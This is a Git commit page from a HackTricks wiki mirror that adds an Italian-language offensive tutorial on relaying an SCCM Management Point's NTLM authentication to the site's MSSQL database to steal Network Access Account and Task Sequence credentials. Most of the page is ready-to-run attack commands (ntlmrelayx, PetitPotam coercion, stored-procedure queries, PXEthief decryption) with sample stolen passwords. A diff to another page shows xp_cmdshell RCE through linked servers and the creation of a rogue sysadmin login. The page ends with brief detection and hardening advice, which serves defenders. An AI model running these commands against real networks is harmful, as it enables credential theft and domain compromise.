maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/windows-hardening/active-directory-methodology/abusing-

Browse Source
This commit is contained in:
Translator 2025-07-22 08:30:53 +00:00
parent 6872771e43
commit 3af7863927
3 changed files with 168 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
src/SUMMARY.md
View File

@ -283,6 +283,7 @@
- [Privileged Groups](windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md)
- [RDP Sessions Abuse](windows-hardening/active-directory-methodology/rdp-sessions-abuse.md)
- [Resource-based Constrained Delegation](windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md)
- [Sccm Management Point Relay Sql Policy Secrets](windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md)
- [Security Descriptors](windows-hardening/active-directory-methodology/security-descriptors.md)
- [SID-History Injection](windows-hardening/active-directory-methodology/sid-history-injection.md)
- [Silver Ticket](windows-hardening/active-directory-methodology/silver-ticket.md)

17
src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md
View File

@ -230,9 +230,9 @@ Nota che metasploit cercherà di abusare solo della funzione `openquery()` in MS
### Manuale - Openquery()
Da **Linux** puoi ottenere una shell console MSSQL con **sqsh** e **mssqlclient.py.**
Da **Linux** potresti ottenere una shell console MSSQL con **sqsh** e **mssqlclient.py.**
Da **Windows** puoi anche trovare i link ed eseguire comandi manualmente utilizzando un **client MSSQL come** [**HeidiSQL**](https://www.heidisql.com)
Da **Windows** potresti anche trovare i link ed eseguire comandi manualmente utilizzando un **client MSSQL come** [**HeidiSQL**](https://www.heidisql.com)
_Esegui il login utilizzando l'autenticazione di Windows:_
@ -256,7 +256,7 @@ select * from openquery("dcorp-sql1", 'select * from master..sysservers')
![](<../../images/image (643).png>)
Puoi continuare questa catena di link fidati all'infinito manualmente.
Puoi continuare questa catena di link fidati per sempre manualmente.
```sql
# First level RCE
SELECT * FROM OPENQUERY("<computer>", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''')
@ -274,13 +274,20 @@ Puoi anche abusare dei link fidati utilizzando `EXECUTE`:
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
```
## Elevazione dei privilegi locali
## Escalazione dei privilegi locali
L'**utente locale MSSQL** di solito ha un tipo speciale di privilegio chiamato **`SeImpersonatePrivilege`**. Questo consente all'account di "impersonare un client dopo l'autenticazione".
Una strategia che molti autori hanno ideato è forzare un servizio SYSTEM ad autenticarsi a un servizio rogue o man-in-the-middle che l'attaccante crea. Questo servizio rogue è quindi in grado di impersonare il servizio SYSTEM mentre sta cercando di autenticarsi.
Una strategia che molti autori hanno ideato è forzare un servizio SYSTEM ad autenticarsi a un servizio rogue o man-in-the-middle creato dall'attaccante. Questo servizio rogue è quindi in grado di impersonare il servizio SYSTEM mentre sta cercando di autenticarsi.
[SweetPotato](https://github.com/CCob/SweetPotato) ha una raccolta di queste varie tecniche che possono essere eseguite tramite il comando `execute-assembly` di Beacon.
### Relay NTLM del punto di gestione SCCM (Estrazione dei segreti OSD)
Scopri come i ruoli SQL predefiniti dei **Punti di gestione SCCM** possono essere abusati per estrarre direttamente l'Account di Accesso alla Rete e i segreti della Sequenza di Attività dal database del sito:
{{#ref}}
sccm-management-point-relay-sql-policy-secrets.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}

155
src/windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md Normal file
View File

@ -0,0 +1,155 @@
# Estrazione dei segreti della politica OSD tramite NTLM Relay del Punto di Gestione SCCM a SQL
{{#include ../../banners/hacktricks-training.md}}
## TL;DR
Costringendo un **System Center Configuration Manager (SCCM) Management Point (MP)** ad autenticarsi tramite SMB/RPC e **rilasciando** quel conto macchina NTLM al **database del sito (MSSQL)** si ottengono diritti `smsdbrole_MP` / `smsdbrole_MPUserSvc`. Questi ruoli ti consentono di chiamare un insieme di procedure memorizzate che espongono i blob delle politiche di **Operating System Deployment (OSD)** (credenziali dell'Account di Accesso alla Rete, variabili della Sequenza di Attività, ecc.). I blob sono codificati/encriptati in esadecimale ma possono essere decodificati e decrittografati con **PXEthief**, restituendo segreti in chiaro.
Catena ad alto livello:
1. Scoprire MP & DB del sito ↦ endpoint HTTP non autenticato `/SMS_MP/.sms_aut?MPKEYINFORMATIONMEDIA`.
2. Avviare `ntlmrelayx.py -t mssql://<SiteDB> -ts -socks`.
3. Costringere MP utilizzando **PetitPotam**, PrinterBug, DFSCoerce, ecc.
4. Attraverso il proxy SOCKS connettersi con `mssqlclient.py -windows-auth` come conto **<DOMAIN>\\<MP-host>$** rilasciato.
5. Eseguire:
* `use CM_<SiteCode>`
* `exec MP_GetMachinePolicyAssignments N'<UnknownComputerGUID>',N''`
* `exec MP_GetPolicyBody N'<PolicyID>',N'<Version>'` (o `MP_GetPolicyBodyAfterAuthorization`)
6. Rimuovere `0xFFFE` BOM, `xxd -r -p` → XML → `python3 pxethief.py 7 <hex>`.
Segreti come `OSDJoinAccount/OSDJoinPassword`, `NetworkAccessUsername/Password`, ecc. vengono recuperati senza toccare PXE o client.
---
## 1. Enumerazione degli endpoint MP non autenticati
L'estensione ISAPI MP **GetAuth.dll** espone diversi parametri che non richiedono autenticazione (a meno che il sito non sia solo PKI):
| Parametro | Scopo |
|-----------|-------|
| `MPKEYINFORMATIONMEDIA` | Restituisce la chiave pubblica del certificato di firma del sito + GUID dei dispositivi **All Unknown Computers** *x86* / *x64*. |
| `MPLIST` | Elenca ogni Punto di Gestione nel sito. |
| `SITESIGNCERT` | Restituisce il certificato di firma del Sito Primario (identifica il server del sito senza LDAP). |
Prendi i GUID che fungeranno da **clientID** per le query DB successive:
```bash
curl http://MP01.contoso.local/SMS_MP/.sms_aut?MPKEYINFORMATIONMEDIA | xmllint --format -
```
---
## 2. Trasmettere l'account macchina MP a MSSQL
```bash
# 1. Start the relay listener (SMB→TDS)
ntlmrelayx.py -ts -t mssql://10.10.10.15 -socks -smb2support
# 2. Trigger authentication from the MP (PetitPotam example)
python3 PetitPotam.py 10.10.10.20 10.10.10.99 \
-u alice -p P@ssw0rd! -d CONTOSO -dc-ip 10.10.10.10
```
Quando la coercizione si attiva, dovresti vedere qualcosa del genere:
```
[*] Authenticating against mssql://10.10.10.15 as CONTOSO/MP01$ SUCCEED
[*] SOCKS: Adding CONTOSO/MP01$@10.10.10.15(1433)
```
---
## 3. Identificare le politiche OSD tramite procedure memorizzate
Connettersi tramite il proxy SOCKS (porta 1080 per impostazione predefinita):
```bash
proxychains mssqlclient.py CONTOSO/MP01$@10.10.10.15 -windows-auth
```
Passa al DB **CM_<SiteCode>** (usa il codice sito di 3 cifre, ad esempio `CM_001`).
### 3.1 Trova GUID di Computer Sconosciuti (opzionale)
```sql
USE CM_001;
SELECT SMS_Unique_Identifier0
FROM dbo.UnknownSystem_DISC
WHERE DiscArchKey = 2; -- 2 = x64, 0 = x86
```
### 3.2 Elenca le politiche assegnate
```sql
EXEC MP_GetMachinePolicyAssignments N'e9cd8c06-cc50-4b05-a4b2-9c9b5a51bbe7', N'';
```
Ogni riga contiene `PolicyAssignmentID`, `Body` (esadecimale), `PolicyID`, `PolicyVersion`.
Concentrati sulle politiche:
* **NAAConfig** credenziali dell'Account di Accesso alla Rete
* **TS_Sequence** variabili della Sequenza di Attività (OSDJoinAccount/Password)
* **CollectionSettings** può contenere account di esecuzione
### 3.3 Recupera il corpo completo
Se hai già `PolicyID` e `PolicyVersion`, puoi saltare il requisito clientID utilizzando:
```sql
EXEC MP_GetPolicyBody N'{083afd7a-b0be-4756-a4ce-c31825050325}', N'2.00';
```
> IMPORTANTE: In SSMS aumentare "Caratteri Massimi Recuperati" (>65535) o il blob verrà troncato.
---
## 4. Decodifica e decripta il blob
```bash
# Remove the UTF-16 BOM, convert from hex → XML
echo 'fffe3c003f0078…' | xxd -r -p > policy.xml
# Decrypt with PXEthief (7 = decrypt attribute value)
python3 pxethief.py 7 $(xmlstarlet sel -t -v "//value/text()" policy.xml)
```
Esempio di segreti recuperati:
```
OSDJoinAccount : CONTOSO\\joiner
OSDJoinPassword: SuperSecret2025!
NetworkAccessUsername: CONTOSO\\SCCM_NAA
NetworkAccessPassword: P4ssw0rd123
```
---
## 5. Ruoli e procedure SQL rilevanti
Al momento del relay, il login è mappato a:
* `smsdbrole_MP`
* `smsdbrole_MPUserSvc`
Questi ruoli espongono dozzine di permessi EXEC, i principali utilizzati in questo attacco sono:
| Procedura Memorizzata | Scopo |
|-----------------------|-------|
| `MP_GetMachinePolicyAssignments` | Elenca le politiche applicate a un `clientID`. |
| `MP_GetPolicyBody` / `MP_GetPolicyBodyAfterAuthorization` | Restituisce il corpo completo della politica. |
| `MP_GetListOfMPsInSiteOSD` | Restituito dal percorso `MPKEYINFORMATIONMEDIA`. |
Puoi ispezionare l'elenco completo con:
```sql
SELECT pr.name
FROM sys.database_principals AS dp
JOIN sys.database_permissions AS pe ON pe.grantee_principal_id = dp.principal_id
JOIN sys.objects AS pr ON pr.object_id = pe.major_id
WHERE dp.name IN ('smsdbrole_MP','smsdbrole_MPUserSvc')
AND pe.permission_name='EXECUTE';
```
---
## 6. Rilevamento e Indurimento
1. **Monitora gli accessi MP** qualsiasi account computer MP che accede da un IP che non è il suo host ≈ relay.
2. Abilita **Protezione Estesa per l'Autenticazione (EPA)** sul database del sito (`PREVENT-14`).
3. Disabilita NTLM non utilizzati, applica la firma SMB, limita RPC (
stesse mitigazioni utilizzate contro `PetitPotam`/`PrinterBug`).
4. Indurire la comunicazione MP ↔ DB con IPSec / mutual-TLS.
---
## Vedi anche
* Fondamenti del relay NTLM:
{{#ref}}
../ntlm/README.md
{{#endref}}
* Abuso di MSSQL e post-exploitation:
{{#ref}}
abusing-ad-mssql.md
{{#endref}}
## Riferimenti
- [Id Like to Speak to Your Manager: Stealing Secrets with Management Point Relays](https://specterops.io/blog/2025/07/15/id-like-to-speak-to-your-manager-stealing-secrets-with-management-point-relays/)
- [PXEthief](https://github.com/MWR-CyberSec/PXEThief)
- [Misconfiguration Manager ELEVATE-4 & ELEVATE-5](https://github.com/subat0mik/Misconfiguration-Manager)
{{#include ../../banners/hacktricks-training.md}}